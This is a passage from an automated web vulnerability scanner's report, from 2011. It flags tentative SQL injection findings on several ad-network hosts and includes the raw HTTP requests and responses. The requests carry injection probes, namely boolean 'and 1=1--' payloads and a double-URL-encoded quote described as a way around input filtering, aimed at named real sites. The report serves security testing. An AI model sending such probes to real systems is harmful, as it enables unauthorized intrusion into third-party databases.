ut="1%3AXZFbkoMgFET3wrcfPKJY2Y1EI0Qe8kgsDdl7gBmndH4Pp%2Bt2F2%2FwwuD6BtOwLsb1HlyBW6R6RmSVpzSiCKsMfAYz7Qu4cd6OFnavBOUYVMSRVV4ITbLFYIlF9JhgdnU94TqMP09DcnFfWUu2JZGWOJkIqnfvbk7eTtWJejlImQgLi4k0Noz8ifpfXDZibS6Z9vApj%2B35nOD24KdJ3Byhn0jIlrIalUkXZdIkp4wuNW3f%2FobLcVGfW2LvUmxe71rHLiIUtv3MgLPJ4XiIN%2FR2jIMKsE7rwYnyKeDz%2BQI%3D"; vsd=0@1@4dc81431@load.exelator.com

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 13:19:37 GMT
Set-Cookie: b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Wed, 09-May-2012 13:19:37 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcYxaeOzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQgJHl1gwYoMzcqhYiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EICR5dYMGKDM3KoWIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Mon, 08-Aug-2011 13:19:37 GMT
Set-Cookie: ut="1%3AXZFLloMgEEX3wtgBnyCe7EbFKJGPgImtIXtvIG239vTWrfeKwws8Mbi%2BwNiti3Hcgytwi1SPgKzyjAUUYJGAT2BiPIN2GKrewvoZoexnFXBoCi%2BEJslqYF4L6D7C5Go6Yjr3n1EXXcwLa8m2RFIRJyNBdPdu5uTtVJ2ol52UkTTzYgILZUN%2BRf1vXZZiLS%2BJcviQx%2BuHKcLtPnye5EcyJ6CsRvn6izLwzzVH1ymj85mWVz%2BJuVzQ85U15nVADlE%2F5civNvZg72LBtN60DnGK5m0v6XBaH2B%2FyCxZe8wEBWhqrTsn8k%2BB9%2Fsb"; path=/; domain=.adbrite.com; expires=Fri, 07-May-2021 13:19:37 GMT
Set-Cookie: vsd=0@1@4dc93b69@letters.salon.com; path=/; domain=.adbrite.com; expires=Thu, 12-May-2011 13:19:37 GMT
Set-Cookie: fq="86xtm%2C1uo0%7Clkzecp"; path=/; domain=.adbrite.com; expires=Wed, 09-May-2012 13:19:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 10 May 2011 13:19:37 GMT
Content-Length: 2399

var ADBRITE_setIFrameContent;

if (!ADBRITE_setIFrameContent) {
   ADBRITE_setIFrameContent = [];
}

function AdBriteRender_292a35e5_b798_439f_9862_68be7dcb20b5() {
   var frame = frames.AdBriteFrame_292a
...[SNIP]...

1.8. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [FFChanCap cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://c7.zedo.com
Path:   /bar/v16-406/c5/jsc/fm.js

Issue detail

The FFChanCap cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the FFChanCap cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the FFChanCap cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /bar/v16-406/c5/jsc/fm.js?c=4479/4088/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1128&z=0.20179314771667123 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1%2527; FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1; FFgeo=2241452; PI=h1023448Za926090Zc305005676%2C305005676Zs1423Zt1129

Response 1 (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,4479,15,1:;expires=Wed, 11 May 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,4479,15;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1590B305,4479#885253|0,1,1;expires=Thu, 09 Jun 2011 13:24:16 GMT;path=/;domain=.zedo.com;
ETag: "90e70110-8181-4a1e245688080"
Vary: Accept-Encoding
X-Varnish: 545954342 545954007
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=467
Expires: Tue, 10 May 2011 13:32:03 GMT
Date: Tue, 10 May 2011 13:24:16 GMT
Connection: close
Content-Length: 6751

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1128;var zzPat='';var zz
...[SNIP]...
;
zzWindow.document.close();
}
   }
if(zzIE) {
if(zzShowPop == 0) {
   setTimeout('zzRetryPop()',2000);
}
}
}
function zzRetryPop() {
if(!zzShowPop) {
window.showModelessDialog("javascript:function blockError(){return true;} var zedo_popwin = window.open('" + zzURL + "','_blank','toolbar=no,resizable=yes,scrollbars=no,channelmode=no,directories=no,width=430,height=600,left=" +(screen.height-600)/2 + ",top=
...[SNIP]...

Request 2

GET /bar/v16-406/c5/jsc/fm.js?c=4479/4088/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1128&z=0.20179314771667123 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1%2527%2527; FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1; FFgeo=2241452; PI=h1023448Za926090Zc305005676%2C305005676Zs1423Zt1129

Response 2 (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,4479,15,1:;expires=Wed, 11 May 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,4479,15;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "90e70110-8181-4a1e245688080"
Vary: Accept-Encoding
X-Varnish: 545954342 545954007
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=175
Expires: Tue, 10 May 2011 13:27:12 GMT
Date: Tue, 10 May 2011 13:24:17 GMT
Connection: close
Content-Length: 904

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1128;var zzPat='';var zz
...[SNIP]...

1.9. http://imp.fetchback.com/serve/fb/imp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /serve/fb/imp?tid=59178&type=lead&clicktrack=http://ib.adnxs.com/click/oQeraR1v3j_P91PjpZvcPwAAAKCZmfE_yCk6kst_4j-uR-F6FK7jPxQvhA5f9a4DSsYda6b2ziX1OslNAAAAAKNHAwBlAQAAGgEAAAIAAACoJgQAPWQAAAEAAABVU0QAVVNEANgCWgDWFbkE8g8BAQUCAAIAAAAABSaDgQAAAAA./cnd=!GR5c4gih4AMQqM0QGAAgvcgBMAA41itAAEiaAlAAWABg2gFoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQG5Aa5H4XoUruM_wQGuR-F6FK7jP8kBEFg5tMh28j_QAQA./referrer=http%253A%252F%252Fwww.huffingtonpost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLyQ3CMBAF0B8CyFLa4DqSxx5vSJRAEV7GEsdUQH1UQCXcUd79bVgA3Lrvlqt3lJN0kshKJSZHNbTA2Q8bhhqcnp_7b8N6jNSmZceRqhYmkTGocek0M5fIMotqMDgD6WFwwfJ9G1yB_YU_okJriHMAAAA%253D%2526dst%253D&1%20and%201%3d1--%20=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=oQeraR1v3j_P91PjpZvcPwAAAKCZmfE_yCk6kst_4j-uR-F6FK7jPxQvhA5f9a4DSsYda6b2ziX1OslNAAAAAKNHAwBlAQAAGgEAAAIAAACoJgQAPWQAAAEAAABVU0QAVVNEANgCWgDWFbkE8g8BAgUCAAIAAAAABiaUgQAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLyQ3CMBAF0B8CyFLa4DqSxx5vSJRAEV7GEsdUQH1UQCXcUd79bVgA3Lrvlqt3lJN0kshKJSZHNbTA2Q8bhhqcnp_7b8N6jNSmZceRqhYmkTGocek0M5fIMotqMDgD6WFwwfJ9G1yB_YU_okJriHMAAAA%3D%26dst%3D&tt_code=huffingtonpost.com&udj=uf%28%27a%27%2C+2248%2C+1305033483%29%3Buf%28%27c%27%2C+61473%2C+1305033483%29%3Buf%28%27r%27%2C+272040%2C+1305033483%29%3Bppv%287166%2C+%27265419216675680020%27%2C+1305033483%2C+1336569483%2C+61473%2C+25661%29%3B&cnd=!GR5c4gih4AMQqM0QGAAgvcgBMAA41itAAEiaAlAAWABg2gFoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQG5Aa5H4XoUruM_wQGuR-F6FK7jP8kBEFg5tMh28j_QAQA.&referrer=http://www.huffingtonpost.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304957859_29881:55445:1:0_24309:52570:1:2885_24308:52572:1:2887_29805:59534:2:8185_29807:59535:1:8190_29802:59536:1:596888; kwd=1_1304957859_12936:262797_11317:1214591_11717:1214591_11718:1214591_11719:1214591; scg=1_1304957859; ppd=1_1304957859; uid=1_1305033466_1303179323923:6792170478871670

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:55:26 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1305035726_30829:59178:1:0_29881:55445:1:77867_24309:52570:1:80752_24308:52572:1:80754_29805:59534:2:86052_29807:59535:1:86057_29802:59536:1:674755; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Set-Cookie: uid=1_1305035726_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Set-Cookie: kwd=1_1305035726_12936:340664_11317:1292458_11717:1292458_11718:1292458_11719:1292458; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Set-Cookie: scg=1_1305035726; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Set-Cookie: ppd=1_1305035726; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:26 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 10 May 2011 13:55:26 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6488

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?233429ccd3f3081e4963cf7dd1c978eb4c2611e4614a3203f2d75d0f141ed609c8c6640de8bdf1052201889e865cb3a4" target="_blank" onmouseover="document.getElementById('adchoice').src='http://images.fetchback.com/assets/ad_info/adchoice_rollover.v1.png'" onmouseout="document.getElementById('adchoice').src='http://images.fetchback.com/assets/ad_info/adchoice.v1.png'">
<img style="float:right;position:absolute;z-index:10000;top:0px;right:0px;color:#ffffff;padding:0px;margin:0px;" src="http://images.fetchback.com/assets/ad_info/adchoice.v1.png" id="adchoice" name="adchoice" border="0"/></a>
<image id="hovergif" src="../images/blank.gif" hoverStart="0" hoverTracking="false" width="1" height="1" border="0" alt="" style="position:absolute;top:0px;left:0px;"/>
<script language="javascript" type="text/javascript">
function hoverTrack() {
// note: time is in milliseconds
document.getElementById("hovergif").hoverStart = (new Date()).getTime();
document.getElementById("hovergif").hoverTracking = "true";
   return;
}

function hoverTrackDone() {
if(document.getElementById("hovergif").hoverTracking == "true") {
       // if user has hovered for more than X milliseconds
       var diff = Math.abs((new Date()).getTime() - document.getElementById("hovergif").hoverStart);

if(diff >= 250) {
           document.getElementById("hovergif").src="hover?tid=59178&crid=30829&cb=" + Math.floor(Math.random()*100000000);
   document.getElementById("hovergif").hoverTracking = "false";

           // remove the events listeners; we do not need them anymore
           if(document.removeEventListener) {
               document.removeEventListener("mouseout", hoverTrackDone, false);
               document.removeEventListener("mouseover", hoverTrack, false);
           }

           else if(document.detachEvent) {
               document.detachEvent("onmouseout", hoverTrackDone);
               document.detachEvent("onmouseover", hoverTrack);
           }
       }
   }
   return;
}

// attach events
if(document.addEventListener) {
   document.addEventListener("mouseout", hoverTrackDone, false);
   d
...[SNIP]...

Request 2

GET /serve/fb/imp?tid=59178&type=lead&clicktrack=http://ib.adnxs.com/click/oQeraR1v3j_P91PjpZvcPwAAAKCZmfE_yCk6kst_4j-uR-F6FK7jPxQvhA5f9a4DSsYda6b2ziX1OslNAAAAAKNHAwBlAQAAGgEAAAIAAACoJgQAPWQAAAEAAABVU0QAVVNEANgCWgDWFbkE8g8BAQUCAAIAAAAABSaDgQAAAAA./cnd=!GR5c4gih4AMQqM0QGAAgvcgBMAA41itAAEiaAlAAWABg2gFoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQG5Aa5H4XoUruM_wQGuR-F6FK7jP8kBEFg5tMh28j_QAQA./referrer=http%253A%252F%252Fwww.huffingtonpost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLyQ3CMBAF0B8CyFLa4DqSxx5vSJRAEV7GEsdUQH1UQCXcUd79bVgA3Lrvlqt3lJN0kshKJSZHNbTA2Q8bhhqcnp_7b8N6jNSmZceRqhYmkTGocek0M5fIMotqMDgD6WFwwfJ9G1yB_YU_okJriHMAAAA%253D%2526dst%253D&1%20and%201%3d2--%20=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=oQeraR1v3j_P91PjpZvcPwAAAKCZmfE_yCk6kst_4j-uR-F6FK7jPxQvhA5f9a4DSsYda6b2ziX1OslNAAAAAKNHAwBlAQAAGgEAAAIAAACoJgQAPWQAAAEAAABVU0QAVVNEANgCWgDWFbkE8g8BAgUCAAIAAAAABiaUgQAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLyQ3CMBAF0B8CyFLa4DqSxx5vSJRAEV7GEsdUQH1UQCXcUd79bVgA3Lrvlqt3lJN0kshKJSZHNbTA2Q8bhhqcnp_7b8N6jNSmZceRqhYmkTGocek0M5fIMotqMDgD6WFwwfJ9G1yB_YU_okJriHMAAAA%3D%26dst%3D&tt_code=huffingtonpost.com&udj=uf%28%27a%27%2C+2248%2C+1305033483%29%3Buf%28%27c%27%2C+61473%2C+1305033483%29%3Buf%28%27r%27%2C+272040%2C+1305033483%29%3Bppv%287166%2C+%27265419216675680020%27%2C+1305033483%2C+1336569483%2C+61473%2C+25661%29%3B&cnd=!GR5c4gih4AMQqM0QGAAgvcgBMAA41itAAEiaAlAAWABg2gFoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQG5Aa5H4XoUruM_wQGuR-F6FK7jP8kBEFg5tMh28j_QAQA.&referrer=http://www.huffingtonpost.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304957859_29881:55445:1:0_24309:52570:1:2885_24308:52572:1:2887_29805:59534:2:8185_29807:59535:1:8190_29802:59536:1:596888; kwd=1_1304957859_12936:262797_11317:1214591_11717:1214591_11718:1214591_11719:1214591; scg=1_1304957859; ppd=1_1304957859; uid=1_1305033466_1303179323923:6792170478871670

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:55:27 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1305035727_30826:59178:1:0_29881:55445:1:77868_24309:52570:1:80753_24308:52572:1:80755_29805:59534:2:86053_29807:59535:1:86058_29802:59536:1:674756; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Set-Cookie: uid=1_1305035727_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Set-Cookie: kwd=1_1305035727_12936:340665_11317:1292459_11717:1292459_11718:1292459_11719:1292459; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Set-Cookie: scg=1_1305035727; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Set-Cookie: ppd=1_1305035727; Domain=.fetchback.com; Expires=Sun, 08-May-2016 13:55:27 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 10 May 2011 13:55:27 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6502

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?262777a73fc8d937c491746a414c58568e7003d8663873dd55b3a6a9e0505bb83aaef7d13381435d2201889e865cb3a4" target="_blank" onmouseover="document.getElementById('adchoice').src='http://images.fetchback.com/assets/ad_info/adchoice_rollover.v1.png'" onmouseout="document.getElementById('adchoice').src='http://images.fetchback.com/assets/ad_info/adchoice.v1.png'">
<img style="float:right;position:absolute;z-index:10000;top:0px;right:0px;color:#ffffff;padding:0px;margin:0px;" src="http://images.fetchback.com/assets/ad_info/adchoice.v1.png" id="adchoice" name="adchoice" border="0"/></a>
<image id="hovergif" src="../images/blank.gif" hoverStart="0" hoverTracking="false" width="1" height="1" border="0" alt="" style="position:absolute;top:0px;left:0px;"/>
<script language="javascript" type="text/javascript">
function hoverTrack() {
// note: time is in milliseconds
document.getElementById("hovergif").hoverStart = (new Date()).getTime();
document.getElementById("hovergif").hoverTracking = "true";
   return;
}

function hoverTrackDone() {
if(document.getElementById("hovergif").hoverTracking == "true") {
       // if user has hovered for more than X milliseconds
       var diff = Math.abs((new Date()).getTime() - document.getElementById("hovergif").hoverStart);

if(diff >= 250) {
           document.getElementById("hovergif").src="hover?tid=59178&crid=30826&cb=" + Math.floor(Math.random()*100000000);
   document.getElementById("hovergif").hoverTracking = "false";

           // remove the events listeners; we do not need them anymore
           if(document.removeEventListener) {
               document.removeEventListener("mouseout", hoverTrackDone, false);
               document.removeEventListener("mouseover", hoverTrack, false);
           }

           else if(document.detachEvent) {
               document.detachEvent("onmouseout", hoverTrackDone);
               document.detachEvent("onmouseover", hoverTrack);
           }
       }
   }
   return;
}

// attach events
if(document.addEventListener) {
   document.addEventListener("mouseout", hoverTrackDone, false);
   d
...[SNIP]...

1.10. http://map.media6degrees.com/orbserv/hbjs [rdrlst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The rdrlst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the rdrlst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbjs?pixId=5129&pcv=36 HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4602020164879145|cb=1305033257|adType=iframe|cId=5902|ec=1|spId=30812|advId=1209|exId=21|price=2.133250|pubId=625|secId=414|invId=3715|notifyServer=asd163.sd.pl.pvt|notifyPort=8080|bid=1.75|srcUrlEnc=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AC4E503D48FE2CEEC5068B639D61E649; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si80183m030k0b50u; rdrlst=43c0pahlkze3o000000023m02157rlklhm40000000f3m03144qlkze3o000000023m02157olkxlm50000000a3m0313y7lkze3o000000023m0215sklkkpqq0000000n3m030hsnlkze3o000000023m0212nslkxrxz000000043m030x1blkkpqq0000000n3m030hsplkkpqq0000000n3m0312gdlkkyy00000000j3m030morlkkxrb0000000k3m0314k6lkxlm50000000a3m030w35lkze3o000000023m0213pylkze3o000000023m0214rwlkxlm50000000a3m0314khlkxlm50000000a3m031196lkkkbe0000000t3m0313x4lkxrxz000000043m031195lkkpqh0000000o3m031194lkkjj40000000u3m030dlxlkb5u20000000y3m0316nulkxlm50000000a3m031193lkkplo0000000q3m030p46lkkpqq0000000n3m031192lkkpke0000000s3m03008slklhm40000000f3m0316oilkxlm50000000a3m030moylkl0r50000000g3m03144elkze3o000000023m0212ftlkxrxz000000043m0310poljyxb4000000153m030e6llkl0r50000000g3m03138olkxrxz000000043m0316dnlkze3o000000023m02167ulkxq41000000053m0314qllkxlm50000000a3m03159olk8fax000000103m0315halkxlm50000000a3m030m0ulkl0r50000000g3m030m0plkkxrb0000000k3m0316e6lkxnbq000000093m0314xnlkxlm50000000a3m03167blkl0r50000000g3m0316dxlkze3o000000023m021391lkxrxz000000043m031672lkkxrb0000000k3m030ycrlkncow0000000e3m03158mlkze3o000000023m020okclkze3o000000023m0213lelkxrxz000000043m0313yolkze3o000000023m02137rlkkpqq0000000n3m030ojulkze3o000000023m021240lkxrxz000000043m0314ozlkxlm50000000a3m0314bmlkxrxz000000043m0314j7lkxlm50000000a3m0314bzlkxlm50000000a3m030ni1lkb5u20000000y3m0311pjlkxrxz000000043m030p01lkze3o000000023m0215holkxlm50000000a3m030m7alkkxrb0000000k3m0313mklkxrxz000000043m030m7flkkyyl0000000i3m03101ulkze3o000000023m020zoklkze3o000000023m0212zglkxrxz000000043m0313lxlkxrxz000000043m030zp4lkze3o000000023m02148ilkxlm50000000a3m030xvclkze3o000000023m0212yxlkxrxz000000043m0315iglkxq0l000000063m0316s2lkxpyu000000073m0314hplkxlm50000000a3m030znmlk3462000000133m0314hclkxlm50000000a3m030wd7lkze3o000000023m02102plkxrxz000000043m0310tylkkpku0000000r3m030p1blkb5u20000000y3m030p1alkze3o000000023m0200bvlk9pe80000000z3m0315xylk60qe000000123m0310lxlkxrxz000000043m03103blkxrxz000000043m0310telkd7nq0000000x3m0316rslkxppm000000083m030c9slk9pe80000000z3m0313mxlkze3o000000023m0212emlkze3o000000023m0210rdlkdkly0000000v3m03126qlkxrxz000000043m030mj2lkkxrb0000000k3m030kualkkpqq0000000n3m03163plkxlm50000000a3m030z9xlkze3o000000023m020m45lkl0r50000000g3m030m40lkkxrb0000000k3m030zqylkxrxz000000043m030mjelkkxrb0000000k3m0312qnlkkplt0000000p3m030ovslkze3o000000023m0212x6lkxrxz000000043m030bo8lkb5u20000000y3m0314e9lkze3o000000023m020mjjlkl0r50000000g3m030lw5lkb5